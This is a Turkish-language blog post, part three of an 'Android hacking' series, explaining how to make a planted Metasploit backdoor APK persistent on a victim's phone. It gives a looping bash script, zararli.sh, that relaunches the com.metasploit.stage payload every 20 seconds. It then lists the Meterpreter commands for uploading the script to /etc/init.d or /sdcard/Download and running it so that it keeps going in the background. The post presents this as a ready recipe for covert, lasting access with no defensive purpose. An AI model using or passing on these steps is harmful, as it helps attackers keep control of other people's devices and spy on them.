14 Mayıs 2017 Pazar

Android Hacking Serisi - 3 (Kalıcı Backdoor)


En son meterpreter ekranındayken kullanabileceğimiz ufak komutlardan bahsetmiştik.Bugün ise Android sisteme zararlı apk(backdoor)'gömdükten sonra bu apk'yı nasıl kalıcı hale getirebiliriz ve neler yapabiliriz bunlardan bahsediyor olacağım.

Sistemde bizim Apk mızı kalıcı hale getiricek bir shell script dosyası hazırlayalım. Dosyamızın adını zararli.sh olarak belirledim.













İçine şu kodları yazalım..

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

" #!/bin/bash " diyerek kabukta çalışacağını belirttik.
sleep modunu, komut dosyasının uyku modunda olmasını istediğiniz saniye süresince ayarlayabilirsiniz.



Yazdıktan sonra kaydedelim.


" chmod +x " ile çalıştırma yetkisini verelim..

Shell Script dosyasını etc/init.d/ klasörünün içine atıp çalıştırırsanız , Cihaz reboot edilse bile sistemde kalıcı hale gelirsiniz.
Bunu yapmak için Meterpreter oturumunda iken , aşağıdaki komutları uygulayabilirsiniz.


  • cd /
  • ls
  • cd etc
  • ls
  • cd init.d
  • ls
  • upload /root/android/zararli.sh

Operation failed hatası vericektir. Bunun nedeni ise cihazın rootlanmamış olmasıdır.

Android telefona reboot atılana kadar sistemin içerisinde kalıcı olmak istiyor isek şu komutları kullanabiliriz.


  • cd /
  • cd /sdcard/Download
  • ls
  • upload /root/android/zararli.sh

Belirttiğiniz yere dosyayı upload ettikten sonra , shell komutu ile sisteme giriyoruz.


  • cd /
  • cd /sdcard/Download
  • ls

Şimdi ise icraat zamanı ..

  • sh zararli.sh


ctrl + C yaparak çıkıyoruz . ( " Komut hala arka planda çalışmaya devam ediyor endişe etmeyin :) " )

Dilerseniz exploit veya run komutu ile test edebilirsiniz .

" Android sistemler için kalıcı bir backdoor başarıyla oluşturuldu ! "

Dahası için takipte kalın .. 

0 yorum:

Yorum Gönder